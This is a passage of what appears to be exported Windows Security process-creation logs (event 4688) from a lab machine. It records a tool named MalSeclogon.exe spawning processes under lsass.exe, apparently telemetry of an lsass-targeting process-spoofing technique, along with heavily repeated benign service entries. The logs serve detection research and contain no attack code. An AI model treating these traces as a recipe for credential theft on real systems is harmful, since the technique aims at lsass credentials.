S-1-16-16384 + +" +2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329921 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x1494 + C:\Windows\System32\lsass.exe + %%1936 + 0x27c + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + C:\Windows\System32\lsass.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329920 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x11e4 + C:\Windows\System32\conhost.exe + %%1936 + 0x17b8 + + S-1-0-0 + - + - + 0x0 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329919 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x17b8 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1936 + 0x27c + + S-1-0-0 + IEUser + MSEDGEWIN10 + 0x16e3db3 + C:\Windows\System32\lsass.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329916 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x1bc4 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329914 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + 0x21a4 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1937 + 0x2480 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\cmd.exe + S-1-16-12288 + +" +2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329925 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x24e0 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329921 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x1494 + C:\Windows\System32\lsass.exe + %%1936 + 0x27c + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + C:\Windows\System32\lsass.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329920 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x11e4 + C:\Windows\System32\conhost.exe + %%1936 + 0x17b8 + + S-1-0-0 + - + - + 0x0 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329919 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x17b8 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1936 + 0x27c + + S-1-0-0 + IEUser + MSEDGEWIN10 + 0x16e3db3 + C:\Windows\System32\lsass.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329916 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x1bc4 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329914 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + 0x21a4 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1937 + 0x2480 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\cmd.exe + S-1-16-12288 + +" +2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329925 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x24e0 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329921 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x1494 + C:\Windows\System32\lsass.exe + %%1936 + 0x27c + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + C:\Windows\System32\lsass.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329920 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x11e4 + C:\Windows\System32\conhost.exe + %%1936 + 0x17b8 + + S-1-0-0 + - + - + 0x0 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329919 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x17b8 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1936 + 0x27c + + S-1-0-0 + IEUser + MSEDGEWIN10 + 0x16e3db3 + C:\Windows\System32\lsass.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329916 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x1bc4 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329914 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + 0x21a4 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1937 + 0x2480 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\cmd.exe + S-1-16-12288 + +" +2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329925 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x24e0 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329921 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x1494 + C:\Windows\System32\lsass.exe + %%1936 + 0x27c + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + C:\Windows\System32\lsass.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329920 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x11e4 + C:\Windows\System32\conhost.exe + %%1936 + 0x17b8 + + S-1-0-0 + - + - + 0x0 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329919 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x17b8 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1936 + 0x27c + + S-1-0-0 + IEUser + MSEDGEWIN10 + 0x16e3db3 + C:\Windows\System32\lsass.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329916 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x1bc4 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329914 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + 0x21a4 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1937 + 0x2480 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\cmd.exe + S-1-16-12288 + +" +2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329925 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x24e0 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329921 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x1494 + C:\Windows\System32\lsass.exe + %%1936 + 0x27c + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + C:\Windows\System32\lsass.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329920 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x11e4 + C:\Windows\System32\conhost.exe + %%1936 + 0x17b8 + + S-1-0-0 + - + - + 0x0 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329919 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x17b8 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1936 + 0x27c + + S-1-0-0 + IEUser + MSEDGEWIN10 + 0x16e3db3 + C:\Windows\System32\lsass.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329916 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x1bc4 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329914 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + 0x21a4 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1937 + 0x2480 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\cmd.exe + S-1-16-12288 + +" +2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329925 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x24e0 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329921 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x1494 + C:\Windows\System32\lsass.exe + %%1936 + 0x27c + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + C:\Windows\System32\lsass.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329920 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x11e4 + C:\Windows\System32\conhost.exe + %%1936 + 0x17b8 + + S-1-0-0 + - + - + 0x0 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329919 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x17b8 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1936 + 0x27c + + S-1-0-0 + IEUser + MSEDGEWIN10 + 0x16e3db3 + C:\Windows\System32\lsass.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329916 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x1bc4 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329914 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + 0x21a4 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1937 + 0x2480 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\cmd.exe + S-1-16-12288 + +" +2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329925 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x24e0 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329921 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x1494 + C:\Windows\System32\lsass.exe + %%1936 + 0x27c + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + C:\Windows\System32\lsass.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329920 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x11e4 + C:\Windows\System32\conhost.exe + %%1936 + 0x17b8 + + S-1-0-0 + - + - + 0x0 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329919 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x17b8 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1936 + 0x27c + + S-1-0-0 + IEUser + MSEDGEWIN10 + 0x16e3db3 + C:\Windows\System32\lsass.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329916 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x1bc4 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329914 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + 0x21a4 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1937 + 0x2480 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\cmd.exe + S-1-16-12288 + +" +2022-05-01T08:42:06.656542+04:00,1651380126.656542,4688,C:\Windows\System32\notepad.exe,WIND10$,C:\Windows\System32\wbem\WmiPrvSE.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 21374 + + + + + Security + wind10.winlab.local + + + + + S-1-5-20 + WIND10$ + WINLAB + 0x3e4 + 0x1dc + C:\Windows\System32\notepad.exe + %%1936 + 0xe8c + + S-1-0-0 + Administrator + WINLAB.LOCAL + 0x82215a + C:\Windows\System32\wbem\WmiPrvSE.exe + S-1-16-12288 + +" +2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329925 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x24e0 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329921 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x1494 + C:\Windows\System32\lsass.exe + %%1936 + 0x27c + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + C:\Windows\System32\lsass.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329920 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x11e4 + C:\Windows\System32\conhost.exe + %%1936 + 0x17b8 + + S-1-0-0 + - + - + 0x0 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329919 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x17b8 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1936 + 0x27c + + S-1-0-0 + IEUser + MSEDGEWIN10 + 0x16e3db3 + C:\Windows\System32\lsass.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329916 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + 